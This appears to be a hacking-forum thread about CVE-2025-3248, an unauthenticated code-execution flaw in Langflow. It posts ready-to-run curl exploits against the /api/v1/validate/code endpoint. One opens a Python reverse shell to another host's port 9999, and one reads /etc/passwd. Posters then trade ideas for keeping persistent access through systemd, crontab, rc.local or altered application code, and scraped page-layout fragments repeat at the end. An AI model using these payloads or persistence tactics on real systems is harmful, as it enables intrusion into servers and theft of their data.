Remote Langflow AI - Unauthenticated Remote Code Execution CVE-2025-3248

pianoxltd · 14.04.2025

Abusing Python Exec for Unauth RCE in Langflow AI

Python reverse shell

Код:

curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n  pass"}'

cat /etc/passwd

Код:

curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output([\\\"cat\\\", \\\"/etc/passwd\\\"]))\")\ndef foo():\n  pass"}'

pianoxltd · 14.04.2025

any idea for persistence?

vxero · 14.04.2025

systemd service, crontab, /etc/rc.local ?

pianoxltd · 15.04.2025

systemd service = Permission denied
crontab -l = command not found
/etc/rc.local = No such file or directory

in this case we can use app functionalities?
for example: change code or web directory

Remote Langflow AI - Unauthenticated Remote Code Execution CVE-2025-3248

pianoxltd

RAID-массив

Abusing Python Exec for Unauth RCE in Langflow AI

pianoxltd

RAID-массив

vxero

RAID-массив

pianoxltd

RAID-массив

Remote Langflow AI - Unauthenticated Remote Code Execution CVE-2025-3248

pianoxltd

RAID-массив

Abusing Python Exec for Unauth RCE in Langflow AI​

pianoxltd

RAID-массив

vxero

RAID-массив

pianoxltd

RAID-массив

Abusing Python Exec for Unauth RCE in Langflow AI